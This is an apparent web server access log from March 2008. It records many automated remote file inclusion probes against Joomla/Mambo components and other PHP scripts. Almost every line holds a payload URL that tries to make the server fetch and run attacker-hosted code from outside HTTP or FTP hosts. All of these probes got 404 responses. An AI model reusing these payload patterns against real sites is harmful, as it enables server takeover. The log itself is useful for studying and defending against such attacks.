219.166.61.155 - - [23/Mar/2008:16:50:10 -0700] "GET /logs/error_log.20080224/photo//update/update5.php?lang=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
72.30.214.230 - - [23/Mar/2008:16:50:15 -0700] "GET /logs/error_log.20080217 HTTP/1.0" 200 540672 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
87.230.15.10 - - [23/Mar/2008:16:53:26 -0700] "GET /logs/access_log.20080127/index2.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
87.230.15.10 - - [23/Mar/2008:16:53:27 -0700] "GET /index2.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
87.230.15.10 - - [23/Mar/2008:16:53:27 -0700] "GET /logs/index2.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
66.36.241.244 - - [23/Mar/2008:16:54:03 -0700] "GET /logs/error_log.20080217/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 290 "-" "libwww-perl/5.805"
66.36.241.244 - - [23/Mar/2008:16:54:03 -0700] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
128.241.54.180 - - [23/Mar/2008:16:54:20 -0700] "GET /logs/access_log/modules/My_eGallery/index.php?basepath=http://www.1st-articles.com/articles/friulid.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.65"
195.137.139.73 - - [23/Mar/2008:16:54:36 -0700] "GET /index.php?option=com_swmenupro&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
66.36.241.244 - - [23/Mar/2008:16:54:40 -0700] "GET /logs/access_log/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
87.230.15.10 - - [23/Mar/2008:16:55:39 -0700] "GET /logs/access_log.20080120/index2.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
221.143.48.95 - - [23/Mar/2008:16:55:46 -0700] "GET /logs/access_log.20080127/index2.php?table=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
221.143.48.95 - - [23/Mar/2008:16:55:47 -0700] "GET /index2.php?table=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
221.143.48.95 - - [23/Mar/2008:16:55:47 -0700] "GET /logs/index2.php?table=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
66.225.214.179 - - [23/Mar/2008:16:57:16 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
66.225.214.179 - - [23/Mar/2008:16:57:16 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
213.193.222.218 - - [23/Mar/2008:16:58:47 -0700] "GET //components/com_mambots/layout.php?mosConfig_absolute_path=http://www.ebiexperts.com/components/com_content/mambo??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
85.119.152.13 - - [23/Mar/2008:17:00:18 -0700] "GET /logs/error_log.20080224/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.0" 404 293 "-" "libwww-perl/5.48"
217.110.209.230 - - [23/Mar/2008:17:01:25 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
80.55.150.108 - - [23/Mar/2008:17:02:09 -0700] "GET /logs/access_log/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
80.55.150.108 - - [23/Mar/2008:17:02:10 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 286 "-" "libwww-perl/5.805"
217.110.209.230 - - [23/Mar/2008:17:03:25 -0700] "GET /logs//common/db.php?commonpath=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
217.110.209.230 - - [23/Mar/2008:17:03:29 -0700] "GET //common/db.php?commonpath=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.65"
85.119.152.13 - - [23/Mar/2008:17:03:54 -0700] "GET /logs/error_log.20080217/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.0" 404 278 "-" "libwww-perl/5.48"
85.119.152.13 - - [23/Mar/2008:17:03:55 -0700] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.0" 404 259 "-" "libwww-perl/5.48"
72.36.235.74 - - [23/Mar/2008:17:04:05 -0700] "GET /logs/error_log.20080217/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 290 "-" "libwww-perl/5.79"
72.36.235.74 - - [23/Mar/2008:17:04:05 -0700] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
82.147.142.67 - - [23/Mar/2008:17:04:14 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.topfood.be/awstats/js/jpg?? HTTP/1.1" 404 248 "-" "libwww-perl/5.65"
74.52.2.130 - - [23/Mar/2008:17:04:41 -0700] "GET /logs/error_log.20080217/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 290 "-" "libwww-perl/5.808"
74.52.2.130 - - [23/Mar/2008:17:04:41 -0700] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 271 "-" "libwww-perl/5.808"
82.147.142.67 - - [23/Mar/2008:17:04:49 -0700] "GET /logs/error_log.20080113//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.topfood.be/awstats/js/jpg?? HTTP/1.1" 404 272 "-" "libwww-perl/5.65"
82.147.142.67 - - [23/Mar/2008:17:04:50 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.topfood.be/awstats/js/jpg?? HTTP/1.1" 404 248 "-" "libwww-perl/5.65"
82.147.142.67 - - [23/Mar/2008:17:04:50 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.topfood.be/awstats/js/jpg?? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
85.119.152.13 - - [23/Mar/2008:17:04:54 -0700] "GET /logs/access_log/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.0" 404 270 "-" "libwww-perl/5.48"
72.36.235.74 - - [23/Mar/2008:17:04:57 -0700] "GET /logs/access_log/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 282 "-" "libwww-perl/5.79"
82.147.142.67 - - [23/Mar/2008:17:05:18 -0700] "GET /logs/access_log.20080120//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.topfood.be/awstats/js/jpg?? HTTP/1.1" 404 273 "-" "libwww-perl/5.65"
85.25.137.24 - - [23/Mar/2008:17:05:18 -0700] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
85.25.137.24 - - [23/Mar/2008:17:05:19 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
85.25.137.24 - - [23/Mar/2008:17:05:19 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
74.52.2.130 - - [23/Mar/2008:17:05:20 -0700] "GET /logs/access_log/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 282 "-" "libwww-perl/5.808"
85.25.137.24 - - [23/Mar/2008:17:06:40 -0700] "GET /logs/error_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
128.241.54.180 - - [23/Mar/2008:17:06:53 -0700] "GET /logs/error_log/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.1st-articles.com/articles/friulid.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.65"
128.241.54.180 - - [23/Mar/2008:17:06:53 -0700] "GET /index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.1st-articles.com/articles/friulid.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.65"
128.241.54.180 - - [23/Mar/2008:17:06:53 -0700] "GET /logs/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.1st-articles.com/articles/friulid.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
58.65.239.170 - - [23/Mar/2008:17:07:21 -0700] "GET /logs/access_log.20080210 HTTP/1.1" 200 540672 "-" "-"
217.110.209.230 - - [23/Mar/2008:17:08:02 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
217.110.209.230 - - [23/Mar/2008:17:08:06 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.65"
202.29.32.2 - - [23/Mar/2008:17:08:54 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
128.241.54.180 - - [23/Mar/2008:17:11:45 -0700] "GET /logs/access_log/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.1st-articles.com/articles/friulid.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
66.225.214.179 - - [23/Mar/2008:17:12:36 -0700] "GET /logs/error_log.20080113/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.808"
66.225.214.179 - - [23/Mar/2008:17:13:33 -0700] "GET /logs/access_log.20080113/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.808"
217.110.209.230 - - [23/Mar/2008:17:15:08 -0700] "GET /logs/access_log.20080210//templates/mangobery/footer.sample.php?Site_Path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.65"
212.67.202.72 - - [23/Mar/2008:17:16:31 -0700] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.woodland.net/cal/backgrounds/safe.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.68"
212.67.202.72 - - [23/Mar/2008:17:16:32 -0700] "GET /include/Classes.inc.php?tm_includepath=http://www.woodland.net/cal/backgrounds/safe.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.68"
87.230.15.10 - - [23/Mar/2008:17:21:23 -0700] "GET /logs/error_log.20080127//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
87.230.15.10 - - [23/Mar/2008:17:21:24 -0700] "GET //skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
87.230.15.10 - - [23/Mar/2008:17:21:24 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
80.55.150.108 - - [23/Mar/2008:17:22:19 -0700] "GET /logs/error_log.20080224/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 305 "-" "libwww-perl/5.805"
66.29.10.40 - - [23/Mar/2008:17:23:04 -0700] "GET /logs//ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
66.29.10.40 - - [23/Mar/2008:17:23:04 -0700] "GET //ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.808"
212.79.233.58 - - [23/Mar/2008:17:23:09 -0700] "GET /logs//ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.800"
212.79.233.58 - - [23/Mar/2008:17:23:10 -0700] "GET //ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.800"
200.35.95.235 - - [23/Mar/2008:17:23:14 -0700] "GET /logs/access_log/index.php?option=com_facileforms&cpage=http://claroline.lct-net.cl/id? HTTP/1.1" 404 231 "-" "libwww-perl/5.76"
200.35.95.235 - - [23/Mar/2008:17:23:16 -0700] "GET /index.php?option=com_facileforms&cpage=http://claroline.lct-net.cl/id? HTTP/1.1" 404 227 "-" "libwww-perl/5.76"
200.35.95.235 - - [23/Mar/2008:17:23:19 -0700] "GET /logs/index.php?option=com_facileforms&cpage=http://claroline.lct-net.cl/id? HTTP/1.1" 404 232 "-" "libwww-perl/5.76"
67.195.44.110 - - [23/Mar/2008:17:23:29 -0700] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.44.102 - - [23/Mar/2008:17:23:33 -0700] "GET /logs/access_log.20080203 HTTP/1.0" 200 532480 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
87.230.15.10 - - [23/Mar/2008:17:23:37 -0700] "GET /logs/error_log.20080224//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
85.25.137.24 - - [23/Mar/2008:17:25:10 -0700] "GET /logs/error_log.2008020316/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 273 "-" "libwww-perl/5.803"
85.25.137.24 - - [23/Mar/2008:17:25:11 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
85.25.137.24 - - [23/Mar/2008:17:25:11 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
200.35.95.235 - - [23/Mar/2008:17:25:36 -0700] "GET /logs/access_log/index.php?option=com_facileforms&cpage=http://claroline.lct-net.cl/id? HTTP/1.1" 404 231 "-" "libwww-perl/5.76"
200.35.95.235 - - [23/Mar/2008:17:25:38 -0700] "GET /index.php?option=com_facileforms&cpage=http://claroline.lct-net.cl/id? HTTP/1.1" 404 227 "-" "libwww-perl/5.76"
200.35.95.235 - - [23/Mar/2008:17:25:40 -0700] "GET /logs/index.php?option=com_facileforms&cpage=http://claroline.lct-net.cl/id? HTTP/1.1" 404 232 "-" "libwww-perl/5.76"
200.35.95.235 - - [23/Mar/2008:17:26:04 -0700] "GET /logs/error_log.20080217/index.php?option=com_facileforms&cpage=http://claroline.lct-net.cl/id? HTTP/1.1" 404 239 "-" "libwww-perl/5.76"
210.166.214.136 - - [23/Mar/2008:17:26:49 -0700] "GET /logs/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.malteser-menden.de/joomla/cache/idmic22.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
210.166.214.136 - - [23/Mar/2008:17:26:50 -0700] "GET /index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.malteser-menden.de/joomla/cache/idmic22.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
58.65.239.170 - - [23/Mar/2008:17:27:12 -0700] "GET /logs/access_log.20080210 HTTP/1.1" 200 516096 "-" "-"
85.114.132.12 - - [23/Mar/2008:17:27:14 -0700] "GET /logs//ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
85.114.132.12 - - [23/Mar/2008:17:27:14 -0700] "GET //ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
87.117.225.155 - - [23/Mar/2008:17:27:18 -0700] "GET /logs//ashnews.php?pathtoashnews=http://hearislam.com//photos/1/safe.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
87.117.225.155 - - [23/Mar/2008:17:27:18 -0700] "GET //ashnews.php?pathtoashnews=http://hearislam.com//photos/1/safe.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.808"
87.230.15.10 - - [23/Mar/2008:17:27:27 -0700] "GET /logs/access_log.20080120//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 273 "-" "libwww-perl/5.803"
87.230.15.10 - - [23/Mar/2008:17:27:27 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
87.230.15.10 - - [23/Mar/2008:17:27:27 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
190.54.28.163 - - [23/Mar/2008:17:27:48 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
190.54.28.163 - - [23/Mar/2008:17:27:57 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
220.90.217.79 - - [23/Mar/2008:17:28:07 -0700] "GET /logs//ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
220.90.217.79 - - [23/Mar/2008:17:28:09 -0700] "GET //ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
219.166.61.155 - - [23/Mar/2008:17:28:40 -0700] "GET /logs/error_log.20080224//becommunity/community/index.php?pageurl=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
219.166.61.155 - - [23/Mar/2008:17:28:40 -0700] "GET //becommunity/community/index.php?pageurl=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
219.166.61.155 - - [23/Mar/2008:17:28:41 -0700] "GET /logs//becommunity/community/index.php?pageurl=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
200.35.95.235 - - [23/Mar/2008:17:28:47 -0700] "GET /logs/error_log.20080217/index.php?option=com_facileforms&cpage=http://claroline.lct-net.cl/id? HTTP/1.1" 404 239 "-" "libwww-perl/5.76"
222.239.227.153 - - [23/Mar/2008:17:29:05 -0700] "GET /logs//ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
222.239.227.153 - - [23/Mar/2008:17:29:06 -0700] "GET //ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.65"
85.25.137.24 - - [23/Mar/2008:17:29:45 -0700] "GET /logs/error_log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
64.185.237.140 - - [23/Mar/2008:17:30:02 -0700] "GET /logs/error_log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 279 "-" "libwww-perl/5.808"
64.185.237.140 - - [23/Mar/2008:17:30:02 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 264 "-" "libwww-perl/5.808"
64.185.237.140 - - [23/Mar/2008:17:30:02 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 269 "-" "libwww-perl/5.808"
69.64.76.150 - - [23/Mar/2008:17:30:32 -0700] "GET /logs/access_log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
69.64.76.150 - - [23/Mar/2008:17:30:32 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
69.64.76.150 - - [23/Mar/2008:17:30:33 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
69.64.76.150 - - [23/Mar/2008:17:30:33 -0700] "GET /logs/error_log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
64.38.4.3 - - [23/Mar/2008:17:32:00 -0700] "GET /logs/access_log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id3.txt? HTTP/1.1" 404 287 "-" "libwww-perl/5.808"
64.38.4.3 - - [23/Mar/2008:17:32:01 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id3.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.808"
64.38.4.3 - - [23/Mar/2008:17:32:01 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id3.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.808"
82.147.142.67 - - [23/Mar/2008:17:33:23 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.topfood.be/awstats/js/jpg?? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
82.147.142.67 - - [23/Mar/2008:17:33:23 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.topfood.be/awstats/js/jpg?? HTTP/1.1" 404 248 "-" "libwww-perl/5.65"
219.166.61.155 - - [23/Mar/2008:17:34:05 -0700] "GET /logs/access_log.20080127//becommunity/community/index.php?pageurl=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
85.25.144.250 - - [23/Mar/2008:17:34:33 -0700] "GET /logs/access_log//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.nebatrade.com/mambots/search/foggian.txt???? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
85.25.144.250 - - [23/Mar/2008:17:34:33 -0700] "GET //component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.nebatrade.com/mambots/search/foggian.txt???? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
85.25.144.250 - - [23/Mar/2008:17:34:34 -0700] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.nebatrade.com/mambots/search/foggian.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
87.230.15.10 - - [23/Mar/2008:17:35:38 -0700] "GET /logs/access_log.2008020316//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
216.127.86.119 - - [23/Mar/2008:17:38:47 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.afmp.nl/veteranen/languages/pl/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
216.127.86.119 - - [23/Mar/2008:17:38:49 -0700] "GET //ashnews.php?pathtoashnews=http://www.afmp.nl/veteranen/languages/pl/id.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
64.38.4.3 - - [23/Mar/2008:17:40:07 -0700] "GET /logs/error_log.20080224/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id3.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
85.17.150.2 - - [23/Mar/2008:17:44:09 -0700] "GET /logs/access_log/index.php?_REQUEST=&_REQUEST[option]=com_weblinks&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.visionnoir.com/newsreport/id.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
85.17.150.2 - - [23/Mar/2008:17:44:09 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_weblinks&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.visionnoir.com/newsreport/id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
85.17.150.2 - - [23/Mar/2008:17:44:10 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_weblinks&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.visionnoir.com/newsreport/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
72.10.47.53 - - [23/Mar/2008:17:44:34 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
72.10.47.53 - - [23/Mar/2008:17:44:34 -0700] "GET //skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
81.177.8.166 - - [23/Mar/2008:17:44:34 -0700] "GET /logs/access_log.20080210 HTTP/1.1" 200 1048576 "-" "-"
210.21.49.49 - - [23/Mar/2008:17:44:37 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
210.21.49.49 - - [23/Mar/2008:17:44:38 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
219.94.129.206 - - [23/Mar/2008:17:45:32 -0700] "GET /logs//use/index.html?ref=dizinler.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/t.txt??? HTTP/1.1" 404 226 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
219.94.129.206 - - [23/Mar/2008:17:45:32 -0700] "GET //use/index.html?ref=dizinler.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/t.txt??? HTTP/1.1" 404 221 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
